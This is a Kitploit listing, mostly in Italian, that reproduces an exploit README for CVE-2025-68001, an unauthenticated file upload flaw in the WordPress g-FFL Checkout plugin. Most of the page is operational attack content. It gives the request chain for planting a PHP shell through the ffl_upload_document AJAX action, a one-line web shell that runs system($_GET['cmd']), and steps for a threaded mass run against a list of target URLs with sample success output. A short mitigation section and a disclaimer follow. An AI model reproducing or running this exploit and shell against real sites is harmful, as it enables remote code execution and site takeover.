Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-68001 — WordPress g-FFL Checkout Plugin <= 2.1.0 è vulnerabile a un caricamento arbitrario di file ad alta priorità | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-68001
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubnxploited/cve-2025-68001

CVE-2025-68001

WordPress g-FFL Checkout Plugin <= 2.1.0 è vulnerabile a un caricamento arbitrario di file ad alta priorità

Vedi Repository
35 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68001

Il plugin WordPress g-FFL Checkout <= 2.1.0 è vulnerabile a un Arbitrary File Upload ad alta priorità

  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 Resta un passo avanti. Unisciti a @KNxploited su Telegram — la tua fonte esclusiva per le ultime CVE, zero-day e ricerca exploit all'avanguardia. Aggiornato costantemente. Non per tutti.


📋 Panoramica

CVE-2025-68001 è una vulnerabilità critica di Unauthenticated Arbitrary File Upload (caricamento arbitrario di file senza autenticazione) scoperta nel plugin WordPress g-FFL Checkout di garidium.

La vulnerabilità consente a un attaccante remoto non autenticato di caricare file arbitrari — inclusi web shell — sul server di destinazione tramite l'azione AJAX ffl_upload_document, portando a completa Remote Code Execution (RCE).

CampoDettagli
CVE IDCVE-2025-68001
Pluging-FFL Checkout (g-ffl-checkout)
Versioni interessaten/a fino a <= 2.1.0
Tipo di vulnerabilitàCaricamento file senza restrizioni
ImpattoRemote Code Execution (RCE)
AutenticazioneNon richiesta
Gravità CVSSCritica
RicercatoreNxploited

⚙️ Come Funziona

L'exploit segue una precisa catena d'attacco multi-step:

1. GET /checkout
      ↓
   Extract `checkout_nonce` from inline JavaScript data

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<extracted_nonce>
      document_type=document
      document=<shell.php disguised as image/png>
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️

Il plugin espone un endpoint AJAX ffl_upload_document che:

  • Accetta caricamenti di file senza alcun controllo di autenticazione
  • Non esegue alcuna validazione del tipo di file lato server
  • Restituisce il percorso del file salvato nella sua risposta JSON

🔧 Requisiti

Installa tutte le dipendenze prima di eseguire:

pip install requests rich
DipendenzaScopo
requestsRichieste HTTP e gestione delle sessioni
richInterfaccia terminale, barre di avanzamento, pannelli
threadingElaborazione multi-thread dei target

È richiesto Python 3.8+.


📂 Struttura dei File

CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output

🚀 Utilizzo

Step 1 — Prepara i Tuoi Target

Crea un file list.txt con un URL target per riga:

https://target1.com
https://target2.com
http://target3.com/wordpress

Lo script antepone automaticamente http:// se non viene fornito uno schema.


Step 2 — Prepara la Tua Shell

Posiziona la tua web shell PHP nella stessa directory. Esempio di shell minimale:

<?php system($_GET['cmd']); ?>

Salvala come shell.php (o con qualsiasi nome — ti verrà chiesto di inserirlo).


Step 3 — Esegui l'Exploit

python CVE-2025-68001.py

Ti verrà chiesto in modo interattivo:

Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20

Step 4 — Controlla i Risultati

Gli exploit riusciti vengono salvati automaticamente in success_results.txt:

https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

Ogni riga contiene:

  • URL del target
  • Percorso del file salvato sul server
  • Nome file univoco assegnato dal server
  • Nome file originale caricato

🖥️ Riferimento Parametri dello Script

PromptDefaultDescrizione
File dei targetlist.txtFile contenente gli URL dei target
File della shellshell.phpShell PHP da caricare sul target
Numero di thread50Worker concorrenti (max: 50)

📊 Esempio di Output

✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt

🔍 Percorso del Codice Vulnerabile (Tecnico)

La vulnerabilità risiede nel gestore AJAX del plugin registrato senza controlli di capacità:

// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ Mitigazione e Rimedio

Se sei un proprietario di sito o sviluppatore, adotta immediatamente i seguenti passaggi:

  • ✅ Aggiorna il plugin g-ffl-checkout a una versione patchata (> 2.1.0) se disponibile
  • ✅ Disattiva il plugin finché non viene confermata una patch
  • ✅ Limita i permessi di esecuzione nelle directory di upload (es. regole .htaccess)
  • ✅ Implementa la validazione del tipo di file lato server e una whitelist rigorosa delle estensioni
  • ✅ Monitora le directory di upload per file .php sospetti
  • ✅ Attiva regole WAF per bloccare le richieste di upload AJAX non autenticate

⚠️ Disclaimer

THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.

By using this script, you explicitly agree to the following:

  • You have EXPLICIT written permission from the target system owner.
  • You are operating in a controlled lab or authorized penetration testing engagement.
  • You will NOT use this tool against any system you do not own or have legal
    authorization to test.
  • The author (Nxploited) holds ZERO liability for any damage, data loss,
    legal consequences, or misuse resulting from this tool.
Scarica lo strumento